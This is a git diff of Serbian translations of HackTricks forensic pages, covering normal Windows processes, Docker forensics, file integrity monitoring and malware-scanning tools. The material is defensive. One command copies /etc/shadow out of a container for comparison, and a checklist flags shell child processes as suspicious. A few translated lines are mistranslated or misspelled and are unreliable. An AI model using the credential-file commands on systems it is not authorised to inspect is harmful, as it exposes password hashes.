Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## smss.exe **Session Manager**.\ -Sesija 0 pokreće **csrss.exe** i **wininit.exe** (**OS** **servisi**), dok sesija 1 pokreće **csrss.exe** i **winlogon.exe** (**Korisnička** **sesija**). Međutim, trebali biste videti **samo jedan proces** te **izvršne datoteke** bez potomaka u stablu procesa. +Sesija 0 pokreće **csrss.exe** i **wininit.exe** (**OS** **servisi**), dok sesija 1 pokreće **csrss.exe** i **winlogon.exe** (**Korisnička** **sesija**). Međutim, trebalo bi da vidite **samo jedan proces** te **binarne datoteke bez podprocesa u stablu procesa**. Takođe, sesije osim 0 i 1 mogu značiti da se dešavaju RDP sesije. @@ -24,31 +25,31 @@ Takođe, sesije osim 0 i 1 mogu značiti da se dešavaju RDP sesije. ## csrss.exe **Client/Server Run Subsystem Process**.\ -Upravlja **procesima** i **nitima**, čini **Windows** **API** dostupnim drugim procesima i takođe **mapira pogonska slova**, kreira **privremene datoteke** i upravlja **procesom za gašenje**. +Upravlja **procesima** i **nitima**, čini **Windows** **API** dostupnim drugim procesima i takođe **mapira slova drajva**, kreira **privremene datoteke** i rukuje **procesom gašenja**. -Postoji jedan koji radi u sesiji 0 i još jedan u sesiji 1 (tako da ima **2 procesa** u stablu procesa). Još jedan se kreira **po novoj sesiji**. +Jedan se **pokreće u Sesiji 0, a drugi u Sesiji 1** (tako da ima **2 procesa** u stablu procesa). Još jedan se kreira **po novoj sesiji**. ## winlogon.exe **Windows Logon Process**.\ -Odgovoran je za prijavu/odjavu korisnika. Pokreće **logonui.exe** da zatraži korisničko ime i lozinku, a zatim poziva **lsass.exe** da ih proveri. +Odgovoran je za korisničke **prijave**/**odjave**. Pokreće **logonui.exe** da zatraži korisničko ime i lozinku, a zatim poziva **lsass.exe** da ih proveri. Zatim pokreće **userinit.exe** koji je naveden u **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** sa ključem **Userinit**. -Osim toga, prethodni registar treba da ima **explorer.exe** u **Shell ključu** ili se može zloupotrebiti kao **metoda za trajno prisustvo malvera**. +Pomerajte se, prethodni registar bi trebalo da ima **explorer.exe** u **Shell ključu** ili bi mogao biti zloupotrebljen kao **metoda za trajno prisustvo malvera**. ## wininit.exe **Windows Initialization Process**. \ -Pokreće **services.exe**, **lsass.exe** i **lsm.exe** u sesiji 0. Trebao bi postojati samo 1 proces. +Pokreće **services.exe**, **lsass.exe** i **lsm.exe** u Sesiji 0. Trebalo bi da postoji samo 1 proces. ## userinit.exe **Userinit Logon Application**.\ -Učitava **ntuser.dat u HKCU** i inicijalizuje **korisničko okruženje** i pokreće **logon skripte** i **GPO**. +Učitava **ntduser.dat u HKCU** i inicijalizuje **korisničko** **okruženje** i pokreće **logon** **skripte** i **GPO**. Pokreće **explorer.exe**. @@ -56,35 +57,35 @@ Pokreće **explorer.exe**. ## lsm.exe **Local Session Manager**.\ -Sarađuje sa smss.exe da manipuliše korisničkim sesijama: prijava/odjava, pokretanje ljuske, zaključavanje/otključavanje radne površine, itd. +Sarađuje sa smss.exe da manipuliše korisničkim sesijama: Prijavljivanje/odjavljivanje, pokretanje školjke, zaključavanje/otključavanje radne površine, itd. -Nakon W7, lsm.exe je pretvoren u servis (lsm.dll). +Nakon W7, lsm.exe je transformisan u servis (lsm.dll). -Treba postojati samo 1 proces u W7 i od njih jedan servis koji pokreće DLL. +Trebalo bi da postoji samo 1 proces u W7 i od njih servis koji pokreće DLL. ## services.exe **Service Control Manager**.\ -Učitava **servise** konfigurisane kao **auto-start** i **drajvere**. +**Učitava** **servise** konfigurisane kao **automatsko pokretanje** i **drajvere**. -To je nadređeni proces za **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** i mnoge druge. +To je roditeljski proces za **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** i mnoge druge. -Servisi su definisani u `HKLM\SYSTEM\CurrentControlSet\Services`, a ovaj proces održava bazu podataka u memoriji sa informacijama o servisu koju može pretraživati sc.exe. +Servisi su definisani u `HKLM\SYSTEM\CurrentControlSet\Services` i ovaj proces održava bazu podataka u memoriji informacija o servisu koja se može upitati pomoću sc.exe. -Primetite kako će **neki servisi** raditi u **svom sopstvenom procesu** a drugi će **deliti svchost.exe proces**. +Primetite kako će **neki** **servisi** biti pokrenuti u **svom procesu** dok će drugi biti **deljeni u svchost.exe procesu**. -Treba postojati samo 1 proces. +Trebalo bi da postoji samo 1 proces. ## lsass.exe **Local Security Authority Subsystem**.\ -Odgovoran je za autentifikaciju korisnika i kreiranje **bezbednosnih tokena**. Koristi autentifikacione pakete smeštene u `HKLM\System\CurrentControlSet\Control\Lsa`. +Odgovoran je za autentifikaciju korisnika i stvaranje **sigurnosnih** **tokena**. Koristi autentifikacione pakete smeštene u `HKLM\System\CurrentControlSet\Control\Lsa`. -Upisuje u **bezbednosni događajni zapis** i trebao bi postojati samo 1 proces. +Upisuje u **bezbednosni** **događajni** **log** i trebalo bi da postoji samo 1 proces. -Imajte na umu da je ovaj proces često napadan kako bi se izvukle lozinke. +Imajte na umu da je ovaj proces često meta napada za iskopavanje lozinki. ## svchost.exe @@ -92,13 +93,13 @@ Imajte na umu da je ovaj proces često napadan kako bi se izvukle lozinke. **Generic Service Host Process**.\ Hostuje više DLL servisa u jednom deljenom procesu. -Obično ćete primetiti da se **svchost.exe** pokreće sa zastavicom `-k`. To će pokrenuti upit u registar **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** gde će biti ključ sa argumentom navedenim u -k koji će sadržati servise za pokretanje u istom procesu. +Obično ćete primetiti da je **svchost.exe** pokrenut sa zastavicom `-k`. Ovo će pokrenuti upit u registar **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** gde će biti ključ sa navedenim argumentom u -k koji će sadržati servise za pokretanje u istom procesu. Na primer: `-k UnistackSvcGroup` će pokrenuti: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -Ako se koristi i **zastavica `-s`** sa argumentom, tada se od svchost-a traži da **samo pokrene navedeni servis** u ovom argumentu. +Ako se koristi i **zastavica `-s`** sa argumentom, tada se od svchosta traži da **samo pokrene navedeni servis** u ovom argumentu. -Biće nekoliko procesa `svchost.exe`. Ako neki od njih **ne koristi zastavicu `-k`**, to je vrlo sumnjivo. Ako otkrijete da **services.exe nije roditelj**, to je takođe vrlo sumnjivo. +Biće nekoliko procesa `svchost.exe`. Ako neki od njih **ne koristi zastavicu `-k`**, to je veoma sumnjivo. Ako otkrijete da **services.exe nije roditelj**, to je takođe veoma sumnjivo. ## taskhost.exe @@ -110,28 +111,35 @@ U W8 se naziva taskhostex.exe, a u W10 taskhostw.exe. ## explorer.exe -Ovo je proces odgovoran za **korisnički radnu površinu** i pokretanje datoteka putem ekstenzija. +Ovo je proces odgovoran za **korisničku radnu površinu** i pokretanje datoteka putem ekstenzija datoteka. -Trebao bi biti pokrenut **samo 1** proces **po prijavljenom korisniku**. +**Samo 1** proces bi trebalo da bude pokrenut **po prijavljenom korisniku.** -Pokreće se iz **userinit.exe** koji bi trebao biti završen, tako da za ovaj proces **ne bi trebalo da postoji roditelj**. +Ovo se pokreće iz **userinit.exe** koji bi trebalo da bude završen, tako da **ne bi trebalo da se pojavi roditelj** za ovaj proces. -# Otkrivanje zlonamernih procesa +# Hvatanje zlonamernih procesa -* Pokreće li se iz očekivane putanje? (Nijedna Windows izvršna datoteka ne radi sa privremene lokacije) +* Da li se pokreće sa očekivane putanje? (Windows binarne datoteke ne pokreću se sa privremene lokacije) * Da li komunicira sa čudnim IP adresama? -* Proverite digitalne potpise (Microsoft artefakti trebaju biti potpisani) -* Da li je pravilno napisano? -* Da li se izvršava pod očekivanim SID-om? -* Da li je roditeljski proces očekivani (ako postoji)? +* Proverite digitalne potpise (Microsoft artefakti trebalo bi da budu potpisani) +* Da li je ispravno napisan? +* Da li se pokreće pod očekivanim SID-om? +* Da li je roditeljski proces očekivan (ako postoji)? * Da li su dečiji procesi očekivani? (nema cmd.exe, wscript.exe, powershell.exe..?) +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. -* Ako želite videti **oglašavanje vaše kompanije na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 1ce9f80fe..b95908d8c 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -1,22 +1,23 @@ # Docker forenzika +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Modifikacija kontejnera -Postoje sumnje da je neki docker kontejner kompromitovan: +Postoje sumnje da je neki Docker kontejner kompromitovan: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES @@ -36,18 +37,18 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -U prethodnoj komandi **C** znači **Promenjeno** a **A,** **Dodato**.\ -Ako primetite da je neka zanimljiva datoteka poput `/etc/shadow` izmenjena, možete je preuzeti iz kontejnera radi provere zlonamernih aktivnosti sa: +U prethodnoj komandi **C** znači **Promenjeno** i **A,** **Dodato**.\ +Ako otkrijete da je neka zanimljiva datoteka poput `/etc/shadow` izmenjena, možete je preuzeti iz kontejnera radi provere zlonamernih aktivnosti pomoću: ```bash docker cp wordpress:/etc/shadow. ``` -Možete **uporediti sa originalnim** pokretanjem novog kontejnera i izvlačenjem fajla iz njega: +Takođe možete **uporediti sa originalnim** pokretanjem novog kontejnera i izvlačenjem fajla iz njega: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` -Ako otkrijete da je **dodat sumnjiv fajl** možete pristupiti kontejneru i proveriti ga: +Ako otkrijete da je **dodat neki sumnjiv fajl** možete pristupiti kontejneru i proveriti ga: ```bash docker exec -it wordpress bash ``` @@ -66,7 +67,7 @@ tar -xf image.tar ``` ### Osnovna analiza -Možete dobiti **osnovne informacije** o pokrenutoj slici: +Možete dobiti **osnovne informacije** iz slike koja se pokreće: ```bash docker inspect ``` @@ -74,14 +75,14 @@ Takođe možete dobiti sažetak **istorije promena** sa: ```bash docker history --no-trunc ``` -Takođe možete generisati **dockerfile iz slike** sa: +Možete generisati **dockerfile iz slike** pomoću: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` ### Uronite -Da biste pronašli dodate/izmenjene datoteke u Docker slikama, možete koristiti i [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**izdanja**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alat: +Da biste pronašli dodate/izmenjene datoteke u Docker slikama, takođe možete koristiti [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**izdanja**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alat: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -90,7 +91,7 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koje datoteke su izmenjene/dodate. **Crvena** označava dodate, a **žuta** izmenjene datoteke. Koristite **tab** za prelazak na drugi prikaz i **razmak** za skupljanje/otvaranje foldera. +Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koje datoteke su izmenjene/dodate. **Crvena** boja znači dodato, a **žuta** znači izmenjeno. Koristite **tab** za prelazak na drugi prikaz i **razmak** za skupljanje/otvaranje foldera. Pomoću ovoga nećete moći pristupiti sadržaju različitih faza slike. Da biste to uradili, moraćete **dekompresovati svaki sloj i pristupiti mu**.\ Možete dekompresovati sve slojeve slike iz direktorijuma gde je slika dekompresovana izvršavanjem: diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index eba057939..a1dfbd330 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Učite i vežbajte AWS hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # Osnovna linija -Osnovna linija se sastoji od uzimanja snimka određenih delova sistema kako bi se **uporedila sa budućim stanjem i istakle promene**. +Osnovna linija se sastoji od uzimanja snimka određenih delova sistema kako bi se **uporedila sa budućim statusom i istakle promene**. Na primer, možete izračunati i sačuvati heš svake datoteke na fajl sistemu kako biste mogli da saznate koje datoteke su izmenjene.\ Ovo se takođe može uraditi sa kreiranim korisničkim nalozima, pokrenutim procesima, pokrenutim servisima i bilo čime drugim što se ne bi trebalo mnogo menjati, ili uopšte. @@ -24,7 +25,7 @@ Ovo se takođe može uraditi sa kreiranim korisničkim nalozima, pokrenutim proc Praćenje Integriteta Datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka: -1. **Upoređivanje Osnovne Linije:** Ustanovite osnovnu liniju koristeći atribute datoteka ili kriptografske provere (poput MD5 ili SHA-2) za buduće poređenje radi otkrivanja modifikacija. +1. **Upoređivanje Osnovne Linije:** Uspostavljanje osnovne linije korišćenjem atributa datoteka ili kriptografskih kontrolnih suma (kao što su MD5 ili SHA-2) za buduće poređenje radi otkrivanja modifikacija. 2. **Obaveštenje o Promenama u Realnom Vremenu:** Dobijanje trenutnih obaveštenja kada se datoteke pristupaju ili menjaju, obično putem proširenja jezgra OS-a. ## Alati @@ -37,16 +38,17 @@ Praćenje Integriteta Datoteka (FIM) je kritična bezbednosna tehnika koja štit * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +Učite i vežbajte AWS hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index 8898ba43a..cd1de0486 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ -# Analiza zlonamernog softvera +# Analiza zlonamernosti + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Forenzički CheatSheets @@ -36,8 +37,8 @@ sudo apt-get install -y yara ``` #### Priprema pravila -Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za zlonamerni softver sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Napravite direktorijum _**rules**_ i izvršite ga. Ovo će kreirati fajl nazvan _**malware\_rules.yar**_ koji sadrži sva yara pravila za zlonamerni softver. +Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za zlonamjerni softver sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Kreirajte direktorijum _**rules**_ i izvršite ga. Ovo će kreirati datoteku nazvanu _**malware\_rules.yar**_ koja koja sadrži sva yara pravila za zlonamjerni softver. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -69,21 +70,21 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa** otkriva potencijalno zlonamerne **sposobnosti** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari poput Att\&ck taktika, ili sumnjivih sposobnosti kao što su: +**Capa** otkriva potencijalno zlonamerne **sposobnosti** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari poput Att\&ck taktika ili sumnjivih sposobnosti kao što su: -* provera greške OutputDebugString -* pokretanje kao servis -* kreiranje procesa +- provera greške OutputDebugString +- pokretanje kao servis +- kreiranje procesa Preuzmite ga sa [**Github repozitorijuma**](https://github.com/mandiant/capa). ### IOCs -IOC znači Indikator kompromitovanja. IOC je skup **uslova koji identifikuju** neki potencijalno neželjeni softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovu vrstu zlonamernih datoteka** u svojim **sistemima** i **mrežama**.\ -Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i IOC za taj malver se kreira, druge Plave ekipe ga mogu koristiti da identifikuju malver brže. +IOC znači Indikator kompromitovanja. IOC je skup **uslova koji identifikuju** potencijalno neželjen softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovu vrstu zlonamernih datoteka** na svojim **sistemima** i **mrežama**.\ +Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i IOC za taj malver bude kreiran, druge Plave ekipe ga mogu koristiti da identifikuju malver brže. -Alat za kreiranje ili modifikaciju IOCs je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -Možete koristiti alate poput [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCs na uređaju**. +Alat za kreiranje ili modifikaciju IOCa je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Možete koristiti alate poput [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCe na uređaju**. ### Loki @@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener malvera za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se susreću u deljenim hosting okruženjima. Koristi podatke o pretnjama iz sistema za detekciju upada na mrežnom rubu kako bi izdvojio malver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama takođe potiču iz korisničkih podnesaka sa funkcijom provere LMD i resursima zajednice za malvere. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener malvera za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se susreću u deljenim hosting okruženjima. Koristi podatke o pretnjama iz sistema za otkrivanje upada na mrežnom rubu kako bi izdvojio malver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama takođe potiču iz korisničkih podnesaka sa funkcijom provere LMD i resursima zajednice malvera. ### rkhunter -Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema na moguće **rootkitove** i malvere. +Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema radi mogućih **rootkitova** i malvera. ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` @@ -130,15 +131,15 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) je Python skripta koja koristi različite **statističke metode** za otkrivanje **prikrivenog** i **šifrovanog** sadržaja unutar tekstualnih/skript datoteka. Namera NeoPI-ja je da pomogne u **otkrivanju skrivenog web shell koda**. +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) je Python skripta koja koristi različite **statističke metode** za otkrivanje **prikrivenog** i **šifrovanog** sadržaja unutar tekstualnih/skript fajlova. Namera NeoPI-ja je da pomogne u **otkrivanju skrivenog koda web ljuski**. ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da otkrije **prikriveni**/**sumnjivi kod** kao i datoteke koje koriste **PHP** funkcije često korištene u **malverima**/web shell-ovima. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da otkrije **prikriveni**/**sumnjivi kod** kao i fajlove koji koriste **PHP** funkcije često korištene u **malverima**/web ljuskama. ### Apple Binary Signatures -Prilikom provere nekog **uzorka malvera** uvek treba **proveriti potpis** binarne datoteke jer **razvijalac** koji ju je potpisao može već biti **povezan** sa **malverom**. +Prilikom provere nekog **uzorka malvera** uvek treba **proveriti potpis** binarne datoteke jer **razvojni programer** koji ju je potpisao može već biti **povezan** sa **malverom**. ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -151,14 +152,29 @@ spctl --assess --verbose /Applications/Safari.app ``` ## Tehnike otkrivanja -### Stvaranje datoteka +### Stapanje fajlova -Ako znate da je neki folder koji sadrži **datoteke** veb servera **poslednji put ažuriran na određeni datum**. **Proverite** datum kada su sve **datoteke** na **veb serveru kreirane i izmenjene** i ako je bilo koji datum **sumnjiv**, proverite tu datoteku. +Ako znate da je neki folder koji sadrži **fajlove** veb servera **poslednji put ažuriran na određeni datum**. **Proverite** datum kada su **fajlovi** na **veb serveru kreirani i menjani** i ako je bilo koji datum **sumnjiv**, proverite taj fajl. -### Osnovne vrednosti +### Osnovne linije -Ako datoteke foldera **ne bi trebalo da budu izmenjene**, možete izračunati **heš** **originalnih datoteka** foldera i **uporediti** ih sa **trenutnim**. Sve što je izmenjeno biće **sumnjivo**. +Ako 